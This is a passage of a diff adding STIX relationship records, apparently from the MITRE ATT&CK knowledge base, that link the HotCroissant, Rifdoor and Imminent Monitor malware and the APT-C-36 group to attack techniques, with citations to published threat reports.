+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to upload a file from the command and control (C2) server to the victim machine.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--967c2498-0f51-464f-b5e5-2a0539614033",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.478Z",
+ "created": "2020-05-04T19:13:35.478Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a5720510-fadb-496d-97b5-99cdabb051ab",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.480Z",
+ "created": "2020-05-04T19:13:35.480Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a88e956c-6c71-47e1-b02c-d4c105542690",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.157Z",
+ "created": "2020-05-04T19:13:35.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1678d731-c556-4968-aab1-ae745015308f",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.491Z",
+ "created": "2020-05-04T19:13:35.491Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ee1b1aee-a635-4008-813d-fab125f0b0a5",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.497Z",
+ "created": "2020-05-04T19:13:35.497Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fbc96b86-2c57-40b6-89f7-d7a755275a45",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.499Z",
+ "created": "2020-05-04T19:13:35.499Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--911d7f27-a32e-45fb-a66b-e7b195023c43",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.503Z",
+ "created": "2020-05-04T19:13:35.503Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c0f13745-074b-46ba-ae7a-03385ef79d31",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.506Z",
+ "created": "2020-05-04T19:13:35.506Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has created a new registry entry at HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics with a value of C:\\ProgramData\\Initech\\Initech.exe /run.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--52d12577-199c-41a6-92d6-28d26c023aea",
+ "type": "relationship",
+ "modified": "2020-05-05T21:17:34.539Z",
+ "created": "2020-05-05T15:26:30.431Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as C:\\ProgramData\\Initech\\Initech.exe.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--23b5fd51-bb47-4811-8a38-c768c8fa6b0e",
+ "type": "relationship",
+ "modified": "2020-05-05T21:17:34.608Z",
+ "created": "2020-05-05T15:26:30.438Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has been executed from malicious Excel or Word documents containing macros.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b76d4437-7d55-4369-b262-eb4ca52d6059",
+ "type": "relationship",
+ "modified": "2020-05-05T15:26:30.455Z",
+ "created": "2020-05-05T15:26:30.455Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7d93f85e-52a1-4771-8378-0fabfd707ece",
+ "type": "relationship",
+ "modified": "2020-05-05T15:26:30.458Z",
+ "created": "2020-05-05T15:26:30.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f0f49935-c4e4-4322-8748-2129915950c7",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.318Z",
+ "created": "2020-05-05T15:33:17.774Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7e80ade6-a566-4e2b-b2e4-021f9dd6889a",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.295Z",
+ "created": "2020-05-05T17:07:33.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted strings with a single byte XOR algorithm.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--081406d8-0486-4bfe-8d99-cd505f5cceb6",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.343Z",
+ "created": "2020-05-05T17:07:33.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the Windows version on the compromised host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0d557837-8936-43e7-95fd-2c30938d34d3",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.350Z",
+ "created": "2020-05-05T17:07:33.350Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the username on the compromised host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8087182b-73c3-4efa-aad6-36498531f728",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.356Z",
+ "created": "2020-05-05T17:07:33.356Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the IP address of the compromised host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--24dd7ee4-83ed-4f54-808b-8b0e46797df4",
+ "type": "relationship",
+ "modified": "2020-05-05T21:17:34.628Z",
+ "created": "2020-05-05T17:07:33.360Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)",
+ "relationship_type": "uses",
+ "id": "relationship--28d30695-5015-431d-baa6-9e75088a2a83",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.310Z",
+ "created": "2020-05-05T18:47:47.310Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7393547f-0d33-4070-9569-733e15c72e73",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.313Z",
+ "created": "2020-05-05T18:47:47.313Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e80f97df-4984-4e62-bba6-1333d4c2c977",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.317Z",
+ "created": "2020-05-05T18:47:47.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4151f66f-efcc-4c26-b3b6-8650c0a36258",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.346Z",
+ "created": "2020-05-05T18:47:47.346Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8f0e7661-fa5d-47c4-84b0-44cd31b49764",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.351Z",
+ "created": "2020-05-05T18:47:47.351Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a \"Process Watcher\" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4458ca35-0285-408b-9059-62c36086fd0a",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.353Z",
+ "created": "2020-05-05T18:47:47.353Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--62bf12af-cf11-48e7-8963-4fdf3e23fea0",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.370Z",
+ "created": "2020-05-05T18:47:47.370Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c068603b-bfab-4efd-92c2-01f8d696ea88",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.385Z",
+ "created": "2020-05-05T18:47:47.385Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.(Citation: QiAnXin APT-C-36 Feb2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--ee00cd55-254b-4780-be47-e0f78a327c93",
+ "type": "relationship",
+ "modified": "2020-05-05T19:37:33.806Z",
